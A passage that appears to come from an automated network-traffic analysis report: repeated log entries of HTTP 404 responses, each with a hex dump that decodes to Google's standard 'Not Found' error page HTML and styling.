69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:48 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 